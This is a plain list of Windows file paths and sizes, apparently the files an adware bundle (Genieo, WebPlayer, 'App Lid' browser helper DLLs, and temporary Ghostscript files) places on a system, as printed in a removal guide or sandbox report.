C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewcmyk.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xbm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmdl.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\printafm.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceop.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\caption.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Info-macos.plist (483 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdfwr.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_init.ps (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\unprot.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgo_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_indxd.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ttf.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gswin32c.exe (31554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_icc.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\COPYING (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfopt.ps (9458 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mro_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl1_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidtt.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OS2 (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_std_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010035l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfm.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATB (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\xlatmap (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ll3.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.SGI (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATM (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewjpeg.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\bdftops.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_statd.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ht_ccsto.ps (56210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_patrn.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\errpage.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devn.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs (220 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019063l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_sec.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Sol (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcolor.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2pcl.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Ult (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022024l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021023l.pfb (24930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_epsf.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1enc.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ce_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018032l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_setpd.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\s050000l.pfb (7778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.VMS (1442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xbm (605 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fntem.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dpnxt.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciddc.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019043l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps1.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showchar.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fonts.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskn.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059013l.pfb (27394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wftopfa.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\quit.ps (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskf.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devpxl.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcinfo.ps (4226 bytes)
%Program Files% (x86)\App Lid\App Lid-bho64.dll (835 bytes)
%Program Files% (x86)\App Lid\App Lid-bho.dll (671 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\storage.js (979 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\WebPlayer.exe (7533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\initialize.js (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\common.js (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\initialize.js (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\main.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\main.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (843 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\jsonstorage.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\config.xml (823 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\json.js (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\shortcut.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\web_player.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfA2A6.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\installer.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\xhr.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\tray.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\stub.html (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\event_listener.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\utils.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\io.js (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\targetDefaultPortals.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_tmp_template.txt (61 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xstream-1.3.1.jar (15168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_datetime.stop (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.l4j.ini (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops2_stemmed.stop (416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info_1_7.plist (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_1000_draft.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\da_topwords.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\tr_stops_stemmed.stop (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\servlet-api-2.5.jar (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\heb_white_list.txt (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\smtp.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo_console.l4j.ini (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_common500cleaned.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\x64\NativeUtils.dll (21216 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-core-1.0.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\da_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sac.jar (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_MergedStemmedEnglish.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\NativeUtils.dll (16424 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jetty-webapp-7.3.0.v20110203.jar (32128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_installing.png (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\rome-1.0.jar (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\framework_uninstall.exe (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\es_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\nl_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_numbers.stop (54 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xpp3_min-1.1.4c.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sqlite-jdbc-3.7.2-windows.jar (20624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\it_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed1.stop (559 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed_more.stop (583 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon_dev.png (632 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_morestops.stop (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\ini4j-0.5.1.jar (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\modules-0.3.2.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\dd-plist.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_nationalities.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedList.dat (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-codec-1.6.jar (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_outb.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping_outb.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-runtime-1.0.1.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-api-1.6.0.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info.plist (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_misc.stop (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\cssparser-0.9.5.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_disabled.png (421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_anabel.stop (319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_date_time.stop (499 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultPortals.xml (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\log4j-1.2.15.jar (13368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-logging-1.1.1.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\ro_topwords.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultFeeds.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\genieoLogo24.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\readme.txt (610 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpcore-4.2.jar (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-log4j12-1.6.0.jar (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\es_merged_stemmed.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\es_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_numbers_and_currencies.stop (78 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\hu_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release_mac.properties (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\restfb-1.6.12.jar (10136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_stops_stemmed2.stop (892 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpmime-4.2.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed_new.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sitelang.txt (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_new_items.png (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-collectionschema-1.0.1.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\product_domains.txt (571 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release.properties (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\tr_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\it_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\fr_lang.properties (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_merged_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\hu_stops_stemmed.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_ToBeAddedToStop.stop (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed_v0.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\engine.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\engine.jar (65930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\zombie_icon.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob_withadult.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_dev.properties (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sv_topwords.txt (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_date_time.stop (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed2.stop (347 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_tmp_template_all.txt (176 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fr_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\apache-mime4j-0.6.jar (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fi_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\JGoogleAnalyticsTracker-1.2.1-SNAPSHOT.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\lucene-snowball-3.0.0.jar (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isgenieoalive.dat (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories_multilingual.txt (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac.png (333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\en_top_1000_draft.txt (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\signpost-core-1.2.1.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jdom.jar (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicit_content.dat (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon.png (723 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\en_lang.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D1.tmp (300445 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.exe (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_more.stop (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicitList.dat (491 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\pt_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\ru_lang.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\sv_stops_stemmed.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\default.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\de_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedListByURL.dat (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D2.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_25nouns_wiki.stop (169 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed3.stop (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_stops_stemmed2.stop (395 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\origin\ru_lang.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\genieutils.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\preset_feeds.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\cluto_wrapper.properties (942 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\json.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpclient-4.2.jar (14184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\no_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping.txt (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fi_stops_stemmed.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\amazon_ad_api.jar (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_morestops.stop (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-api-1.0.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_general.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\fr_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_100_draft.txt (582 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_explicit.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jericho-html-3.1.jar (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_articlebase.txt (4 bytes)
